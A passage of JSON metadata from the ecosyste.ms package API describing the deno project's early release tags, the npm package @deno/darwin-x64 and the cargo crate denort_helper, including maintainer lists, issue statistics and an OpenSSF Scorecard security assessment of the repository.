2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T20:32:33.356Z","dependent_packages_count":0,"downloads":10182,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.354594294144324,"dependent_packages_count":36.69686831981711,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":31.025731306980717},"purl":"pkg:npm/%40deno/darwin-x64","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@deno/darwin-x64","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@deno/darwin-x64","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@deno/darwin-x64/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-x64/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-x64/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-x64/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-x64/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-x64/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Fdarwin-x64/codemeta","maintainers":[{"uuid":"ry","login":"ry","name":null,"email":"ry@tinyclouds.org","url":null,"packages_count":44,"html_url":"https://www.npmjs.com/~ry","role":null,"created_at":"2024-12-12T21:25:12.625Z","updated_at":"2024-12-12T21:25:12.625Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ry/packages"},{"uuid":"divy-work","login":"divy-work","name":null,"email":"dj.srivastava23@gmail.com","url":null,"packages_count":45,"html_url":"https://www.npmjs.com/~divy-work","role":null,"created_at":"2024-12-12T21:25:12.785Z","updated_at":"2024-12-12T21:25:12.785Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/divy-work/packages"},{"uuid":"denobot","login":"denobot","name":null,"email":"denobot@deno.com","url":null,"packages_count":28,"html_url":"https://www.npmjs.com/~denobot","role":null,"created_at":"2024-12-12T21:25:12.842Z","updated_at":"2024-12-12T21:25:12.842Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/denobot/packages"},{"uuid":"bartlomieju","login":"bartlomieju","name":null,"email":"biwanczuk@gmail.com","url":null,"packages_count":26,"html_url":"https://www.npmjs.com/~bartlomieju","role":null,"created_at":"2026-03-27T13:02:24.092Z","updated_at":"2026-03-27T13:02:24.092Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/bartlomieju/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5836603,"maintainers_count":1249644,"namespaces_count":427708,"keywords_count":891347,"github":"npm","metadata":{"funded_packages_count":192785,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-04T05:03:39.333Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11548938,"name":"denort_helper","ecosystem":"cargo","description":"Helpers for denort.","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":56,"first_release_published_at":"2025-04-16T21:44:20.977Z","latest_release_published_at":"2026-08-27T15:21:41.340Z","latest_release_number":"0.56.0","last_synced_at":"2026-09-07T22:55:55.506Z","created_at":"2025-04-16T21:46:20.361Z","updated_at":"2026-09-07T22:55:55.506Z","registry_url":"https://crates.io/crates/denort_helper/","install_command":"cargo install denort_helper","documentation_url":"https://docs.rs/denort_helper/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: 